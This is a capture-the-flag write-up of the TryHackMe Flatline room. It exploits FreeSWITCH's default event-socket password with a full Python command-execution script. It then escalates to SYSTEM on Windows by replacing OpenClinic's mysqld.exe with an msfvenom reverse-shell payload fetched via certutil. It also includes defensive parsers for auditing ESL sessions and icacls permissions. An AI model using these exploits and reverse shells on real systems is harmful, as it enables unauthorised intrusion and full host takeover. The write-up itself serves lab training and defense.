[TryHackMe] Flatline

https://tryhackme.com/room/flatline

Description: This is a write-up of the Flatline CTF in TryHackMe.

How low are your morals?

Footprinting

Open ports

It seems that the target does not answer the SYN scan (-sS), as it shows no open ports:

[SYN scan] technique is often referred to as half-open scanning, because you don't open a full TCP connection.

Here, only a full TCP connect scan, using the -sT flag, showed open ports:

kali@kali:~$ nmap -sT -Pn -v10 -p- -oA nmap/tcp_full 10.10.76.179
PORT     STATE SERVICE       REASON
3389/tcp open  ms-wbt-server syn-ack
8021/tcp open  ftp-proxy     syn-ack

Note that -Pn is used to skip Nmap host discovery. Indeed, if the target doesn't respond to ping (Windows blocks ICMP echo requests by default), Nmap would consider the host down and skip the scan.

The open ports are:

  • 3389, which runs the Remote Desktop Protocol (RDP);

  • 8021, which Nmap's service table labels as an FTP proxy.

An in-depth scan of these ports using the Nmap Scripting Engine discloses more interesting information:

kali@kali:~$ nmap -Pn -O -sC -sV -p3389,8021 -oA nmap/vuln 10.10.76.179
PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: WIN-EOM4PK0578N
|   NetBIOS_Domain_Name: WIN-EOM4PK0578N
|   NetBIOS_Computer_Name: WIN-EOM4PK0578N
|   DNS_Domain_Name: WIN-EOM4PK0578N
|   DNS_Computer_Name: WIN-EOM4PK0578N
|   Product_Version: 10.0.17763
|_  System_Time: 2022-02-25T20:52:06+00:00
|_ssl-date: 2022-02-25T20:52:08+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Not valid before: 2021-11-08T16:47:35
|_Not valid after:  2022-05-10T16:47:35
8021/tcp open  freeswitch-event FreeSWITCH mod_event_socket
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running (JUST GUESSING): AVtech embedded (87%)
Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

As we have neither a username nor a password so far, we'll first investigate the FreeSWITCH service running on port 8021.

FreeSWITCH

Analysis

I tried to connect to that supposed FTP service; however, I saw what looks like an HTTP-style header:

kali@kali:~$ ftp 10.10.76.179 8021
Connected to 10.10.76.179.
Content-Type: auth/request
ftp> ls
Not connected.

Thus, I opened that service in a browser and saw the following exchange in Burp:

>>>
GET / HTTP/1.1
Host: 10.10.76.179:8021

<<<
Content-Type: auth/request


Content-Type: command/reply
Reply-Text: -ERR command not found

When I connected to that port using telnet and stayed idle for 10 seconds, the following message appeared:

kali@kali:~$ telnet 10.10.76.179 8021
Trying 10.10.76.179...
Connected to 10.10.76.179.
Escape character is '^]'.
Content-Type: auth/request

Content-Type: text/disconnect-notice
Content-Length: 67

Disconnected, goodbye.
See you at ClueCon! http://www.cluecon.com/
Connection closed by foreign host.

So far, we gathered two interesting pieces of information:

  • The error Reply-Text: -ERR command not found is shown if a wrong password is given;

  • A link to ClueCon is disclosed.

Googling this information reveals that this service uses the default password ClueCon. This password can be specified using the auth command:

kali@kali:~$ telnet 10.10.76.179 8021
Trying 10.10.76.179...
Connected to 10.10.76.179.
Escape character is '^]'.
Content-Type: auth/request

auth ClueCon

Content-Type: command/reply
Reply-Text: +OK accepted

However, all the commands that come afterwards seem not to be processed:

help

Content-Type: command/reply
Reply-Text: -ERR command not found

Command execution

Then, I looked for known vulnerabilities in FreeSWITCH. It might be vulnerable to command execution:

$ searchsploit freeswitch
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit)                           | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution                                              | windows/remote/47799.txt
----------------------------------------------------------------------------------- --------------------------------

The Metasploit module didn't work:

kali@kali:~$ sudo msfconsole
msf6 > use exploit/multi/misc/freeswitch_event_socket_cmd_exec
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set RHOSTS 10.10.76.179
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set LHOST 10.17.8.104
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > exploit
[*] Started reverse TCP double handler on 10.17.8.104:4444
[*] 10.10.76.179:8021 - Login success
[*] 10.10.76.179:8021 - Sending payload (283 bytes) ...
[*] Exploit completed, but no session was created.

Nevertheless, the Python script in /usr/share/exploitdb/exploits/windows/remote/47799.txt worked!

kali@kali:~$ searchsploit -x 47799.txt
#!/usr/bin/python3

import socket
import sys

if len(sys.argv) != 3:
    print('Missing arguments')
    print('Usage: freeswitch-exploit.py <target> <cmd>')
    sys.exit(1)

ADDRESS = sys.argv[1]
CMD = sys.argv[2]
PASSWORD = 'ClueCon'  # default password for FreeSWITCH mod_event_socket

# Connect to the Event Socket listener (TCP 8021)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ADDRESS, 8021))

# The server greets with "Content-Type: auth/request"; every ESL message ends with a blank line
response = s.recv(1024)
if b'auth/request' in response:
    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
    response = s.recv(1024)
    if b'+OK accepted' in response:
        print('Authenticated')
        # "api system <cmd>" runs <cmd> through the shell of the FreeSWITCH host
        s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
        response = s.recv(8096).decode()
        print(response)
    else:
        print('Authentication failed')
        sys.exit(1)
else:
    print('Not prompted for authentication, likely not vulnerable')
    sys.exit(1)
s.close()

The program opens a socket to port 8021 of the target and authenticates to FreeSWITCH using the default password ClueCon. Finally, it uses api system <CMD> to execute commands:

if b'auth/request' in response:
    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))

Once launched, we see the service is prone to OS command injection:

kali@kali:~$ chmod +x ./freeswitch-exploit.py
kali@kali:~$ ./freeswitch-exploit.py 10.10.76.179 "whoami"
Authenticated
Content-Type: api/response
Content-Length: 25

win-eom4pk0578n\nekrotic

It's also possible to do it manually via Telnet:

kali@kali:~$ telnet 10.10.204.137 8021
Trying 10.10.204.137...
Connected to 10.10.204.137.
Escape character is '^]'.
Content-Type: auth/request

auth ClueCon

Content-Type: command/reply
Reply-Text: +OK accepted

api system whoami

Content-Type: api/response
Content-Length: 25

win-eom4pk0578n\nekrotic
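The sessions above show the whole Event Socket Layer (ESL) framing: the server greets with a Content-Type: auth/request frame, each frame is a block of Key: value headers closed by a blank line, and api/response frames carry a Content-Length body with the command output. As an added example that is not part of this write-up or of FreeSWITCH, here is a small Python parser for that framing, plus a check a defender can run over a captured session to flag logins with the default password and OS command execution through api system. The client and server byte streams below are constructed to mirror the telnet session, not captured from the box.

```python
from __future__ import annotations

DEFAULT_PASSWORD = "ClueCon"        # FreeSWITCH ships with this password in event_socket.conf.xml
SHELL_API_COMMANDS = ("system",)    # "api system <cmd>" runs <cmd> through the host's shell

# Constructed capture of one client->server session (not taken from the box)
CLIENT_STREAM = b"auth ClueCon\n\napi system whoami\n\nhelp\n\n"
SERVER_STREAM = (
    b"Content-Type: auth/request\n\n"
    b"Content-Type: command/reply\nReply-Text: +OK accepted\n\n"
    b"Content-Type: api/response\nContent-Length: 25\n\n"
    b"win-eom4pk0578n\\nekrotic\n"                     # 25-byte body, as in the write-up
    b"Content-Type: command/reply\nReply-Text: -ERR command not found\n\n"
)


def parse_esl_frames(data: bytes) -> list[tuple[dict, str]]:
    """Split a server->client ESL stream into (headers, body) frames.

    A frame is a block of "Key: value" lines terminated by a blank line; when the
    headers carry Content-Length, exactly that many bytes of body follow (this is
    how api/response frames return command output)."""
    frames = []
    pos = 0
    while (end := data.find(b"\n\n", pos)) != -1:
        headers = {}
        for line in data[pos:end].decode("utf-8", "replace").split("\n"):
            key, sep, value = line.partition(": ")
            if sep:
                headers[key] = value
        pos = end + 2
        length = int(headers.get("Content-Length", 0))
        body = data[pos:pos + length].decode("utf-8", "replace")
        pos += length
        frames.append((headers, body))
    return frames


def parse_esl_commands(data: bytes) -> list[str]:
    """Client commands are plain text lines, each terminated by a blank line."""
    return [c.strip() for c in data.decode("utf-8", "replace").split("\n\n") if c.strip()]


def audit_esl_session(client_bytes: bytes, server_bytes: bytes) -> list[dict]:
    """Pair each client command with the reply that answers it and flag
    default-password logins and OS command execution via "api system"."""
    commands = parse_esl_commands(client_bytes)
    replies = [f for f in parse_esl_frames(server_bytes)
               if f[0].get("Content-Type") in ("command/reply", "api/response")]
    findings = []
    for command, (headers, body) in zip(commands, replies):
        words = command.split()
        if words[:1] == ["auth"] and words[1:2] == [DEFAULT_PASSWORD]:
            findings.append({
                "kind": "default-password-auth",
                "accepted": headers.get("Reply-Text", "").startswith("+OK"),
            })
        elif words[:1] == ["api"] and words[1:2] and words[1] in SHELL_API_COMMANDS:
            findings.append({
                "kind": "api-system-command",
                "command": " ".join(words[2:]),
                "output": body,
            })
    return findings


if __name__ == "__main__":
    for finding in audit_esl_session(CLIENT_STREAM, SERVER_STREAM):
        print(finding)
```

On the constructed session the audit reports an accepted default-password login followed by api system whoami and its output. The fix on the FreeSWITCH side is in autoload_configs/event_socket.conf.xml: change the password parameter, keep listen-ip on 127.0.0.1 unless remote ESL clients are really needed, and restrict callers with apply-inbound-acl.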

Local privilege escalation

user.txt

From there, it is possible to launch a PowerShell #2 reverse shell:

kali@kali:~$ nc -nlvp 4444
listening on [any] 4444 ...
kali@kali:~$ ./freeswitch-exploit.py 10.10.182.234 "$(cat revshell.ps1)"
connect to [10.17.8.104] from (UNKNOWN) [10.10.76.179] 49891
whoami
win-eom4pk0578n\nekrotic
PS C:\Program Files\FreeSWITCH>

On Windows boxes, it's generally good practice to investigate the Documents, Downloads and Desktop folders of each user, as well as the C:\ root directory.

The user flag was located on the Desktop of user Nekrotic :)

PS C:\users\nekrotic\desktop> Get-Content user.txt
THM{64[...]6}

root.txt

In that same folder, a root flag is present:

PS C:\users\nekrotic\desktop> dir


    Directory: C:\users\nekrotic\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       09/11/2021     07:39             38 root.txt
-a----       09/11/2021     07:39             38 user.txt

Obviously, we cannot read it; it would have been too simple :[

PS C:\users\nekrotic\desktop> Get-Content root.txt
PS C:\users\nekrotic\desktop>

However, the C:\projects folder contains a project named openclinic:

PS C:\projects\openclinic> dir


    Directory: C:\projects\openclinic


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       09/11/2021     07:29                jdk1.8
d-----       09/11/2021     07:19                mariadb
d-----       09/11/2021     07:30                tomcat8
d-----       09/11/2021     07:29                Uninstall
-a----       06/04/2021     23:14            250 configureCountry.bat
-a----       01/07/2021     18:20            167 configureLanguage.bat
-a----       09/11/2021     07:18         334840 lua5.1.dll
-a----       07/06/2021     16:58          93696 OpenClinic GA login.exe
-a----       08/05/2020     12:17          27136 OpenClinicStartServices.exe
-a----       02/05/2021     00:45            316 stopOpenClinicHttp.bat
-a----       09/11/2021     07:18        1389568 uninstall.exe

This project might be vulnerable to local privilege escalation:

kali@kali:~$ searchsploit openclinic
------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                     |  Path
------------------------------------------------------------------- ---------------------------------
OpenClinic GA 5.194.18 - Local Privilege Escalation                | windows/local/50448.txt
------------------------------------------------------------------- --------------------------------

The exploit details say:

kali@kali:~$ searchsploit -x 50448.txt

A low privilege account is able to rename mysqld.exe or tomcat8.exe [...] and replace [them] with a malicious file that would connect back to an attacking computer giving system level privileges (nt authority\system) due to the service running as Local System.

While a low privilege user is unable to restart the service through the application, a restart of the computer triggers the execution of the malicious file.

Thus, following the PoC of the exploit:

  1. I generated a Windows reverse shell and listened for connections:

kali@kali:~$ msfvenom -p windows/shell_reverse_tcp LHOST=10.17.8.104 LPORT=4242 -f exe > mysqld_evil.exe
kali@kali:~$ nc -lnvp 4242

  2. I hosted a local web server in the directory containing the msfvenom payload:

kali@kali:~$ python -m http.server 8080 -d ./
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

  3. I renamed mysqld.exe to a backup file:

PS C:\> cd C:\projects\openclinic\mariadb\bin
PS C:\projects\openclinic\mariadb\bin> Move-Item mysqld.exe mysqld.bak

  4. I downloaded the payload under the name mysqld.exe, using certutil.exe:

PS C:\projects\openclinic\mariadb\bin> certutil.exe -urlcache -split -f http://10.17.8.104:8080/mysqld_evil.exe mysqld.exe
****  Online  ****
  000000  ...
  01204a
CertUtil: -URLCache command completed successfully.

Finally, I restarted the target computer so that the vulnerable service would start again as NT Authority\System:

PS C:\projects\openclinic\mariadb\bin> Restart-Computer

After some time, the listener received a reverse shell running as nt authority\system!

kali@kali:~$ nc -lvp 4242
listening on [any] 4242 ...
10.10.18.229: inverse host lookup failed: Unknown host
connect to [10.17.8.104] from (UNKNOWN) [10.10.18.229] 49670
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
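The escalation works only because a low-privilege user can rename and replace a binary that a Local System service executes, so the defender's check is the ACL on service binaries and their directories. As an added example that is not part of this write-up, here is a Python parser for the output of icacls that flags objects which Users, Everyone or Authenticated Users can modify. The icacls output embedded below is constructed for illustration; the Modify grant to BUILTIN\Users on C:\projects\openclinic\mariadb\bin is an assumption about what such a misconfiguration looks like, not something the write-up shows.

```python
from __future__ import annotations
import re

# Principals every interactive low-privilege user belongs to
LOW_PRIV_PRINCIPALS = {"BUILTIN\\Users", "Everyone", "NT AUTHORITY\\Authenticated Users"}
# icacls rights that allow a file to be replaced or renamed: the simple rights F/M/W/D
# plus the specific rights icacls prints individually when no simple right matches
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "DC", "WDAC", "WO"}
INHERITANCE_FLAGS = {"I", "OI", "CI", "IO", "NP"}

# A principal contains a space only for a few well-known authorities
_WHO = r"(?:NT AUTHORITY|NT SERVICE|CREATOR OWNER|CREATOR GROUP|[^\s:]+)(?:\\[^\s:]+)?"
_FIRST_LINE = re.compile(rf"^(?P<path>.+?) (?P<who>{_WHO}):(?P<flags>(?:\([^)]*\))+)\s*$")
_ACE_LINE = re.compile(rf"^(?P<who>{_WHO}):(?P<flags>(?:\([^)]*\))+)\s*$")

# Constructed icacls output (assumed ACLs, not taken from the box)
SAMPLE_ICACLS = r"""C:\projects\openclinic\mariadb\bin BUILTIN\Users:(OI)(CI)(M)
                                   NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                   BUILTIN\Administrators:(I)(OI)(CI)(F)
C:\projects\openclinic\mariadb\bin\mysqld.exe BUILTIN\Users:(I)(M)
                                              NT AUTHORITY\SYSTEM:(I)(F)
                                              BUILTIN\Administrators:(I)(F)
C:\Windows\System32\svchost.exe NT AUTHORITY\SYSTEM:(I)(F)
                                BUILTIN\Administrators:(I)(F)
                                BUILTIN\Users:(I)(RX)

Successfully processed 3 files; Failed processing 0 files
"""


def _rights(flags: str) -> set[str]:
    """Turn "(I)(OI)(RX,WD)" into the set of rights it grants, dropping inheritance flags."""
    tokens = set()
    for group in re.findall(r"\(([^)]*)\)", flags):
        tokens.update(t.strip() for t in group.split(","))
    return tokens - INHERITANCE_FLAGS


def parse_icacls(output: str) -> dict[str, list[tuple[str, set[str]]]]:
    """Return {path: [(principal, rights), ...]} from icacls output.

    The first ACE of each object shares its line with the path; the remaining
    ACEs of that object follow on indented lines."""
    acls = {}
    current = None
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if raw[0].isspace():
            match = _ACE_LINE.match(line)
            if match is None or current is None:
                continue
        else:
            match = _FIRST_LINE.match(line)
            if match is None:
                continue
            current = match.group("path")
            acls[current] = []
        acls[current].append((match.group("who"), _rights(match.group("flags"))))
    return acls


def audit_acls(acls: dict[str, list[tuple[str, set[str]]]]) -> list[tuple[str, str, list[str]]]:
    """Flag objects a low-privilege principal can modify; on a service binary or its
    directory this is exactly what allows the rename-and-replace seen with mysqld.exe."""
    findings = []
    for path, aces in acls.items():
        for who, rights in aces:
            granted = rights & WRITE_RIGHTS
            if who in LOW_PRIV_PRINCIPALS and granted:
                findings.append((path, who, sorted(granted)))
    return findings


if __name__ == "__main__":
    for path, who, granted in audit_acls(parse_icacls(SAMPLE_ICACLS)):
        print(f"{path}: {who} has {','.join(granted)}")
```

On the host, the input would come from something like icacls C:\projects\openclinic /t redirected to a file; svchost.exe is included in the sample to show that a read-and-execute grant to Users is not flagged. The remediation is to remove the write grant (for example icacls <path> /remove:g "BUILTIN\Users") so that only Administrators and SYSTEM can change what a Local System service runs.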

The root flag is:

C:\Users\Nekrotic\Desktop>type root.txt
THM{8c[...]5e}
